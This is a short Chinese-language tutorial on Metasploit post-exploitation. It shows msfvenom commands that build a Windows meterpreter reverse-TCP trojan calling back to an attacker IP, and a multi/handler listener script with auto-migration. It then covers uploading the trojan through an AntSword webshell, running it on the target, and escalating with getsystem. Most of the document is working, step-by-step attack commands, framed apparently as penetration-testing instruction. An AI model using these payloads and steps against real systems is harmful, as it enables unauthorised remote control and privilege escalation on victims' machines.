使用Metasploit进入后渗透利用阶段
一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器
Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL)
常用选项
-p //指定生成的Payload
--list payload //列出所支持的Payload类型
--list-options //查看模块所支持的选项
msfvenom -p windows/meterpreter/reverse_tcp --list-options //查看模块所支持的选项
-f //指定生成的文件格式
msfvenom --list formats //查看所支持的文件格式
常用的Windows Payload:
windows/meterpreter/reverse_tcp(使用meteperter模块,建立一个反向的TCP连接)
windows/meterpreter_reverse_tcp
windows/x64/meterpreter/reverse_tcp
1、生成反向木马
使用msfvenom生成一个木马程序 (msfvenom是有效载荷(payload)生成工具和编码工具的结合)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.195.20 LPORT=1234 -f exe > shell.exe
2、在kali端创建侦听器
msf中相应的模块:exploit/multi/handler
模块中所使用的payload应该与msfvenom中的payload保持一致
可以把命令写入到一个文件中,MSF
msfconsole -r
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.195.20
set LPORT 1234
set AutoRunScript post/windows/manage/migrate
exploit -j -z
然后使用 -r指定文件名,这样下次就不用一个一个写入了。
3、把生成的shell.exe上传(部署)目标系统
通过蚁剑上传使用msfvenom生成的反向木马
(1)选中目标主机后右击
(2)进入文件系统后点击上传
(3)找到反向木马后上传
4、 执行木马
dir看一下是否传输成功
直接执行该文件
这时候我们返回到MSF中就可以看到了,这时候我们可以使用getsystem直接提权。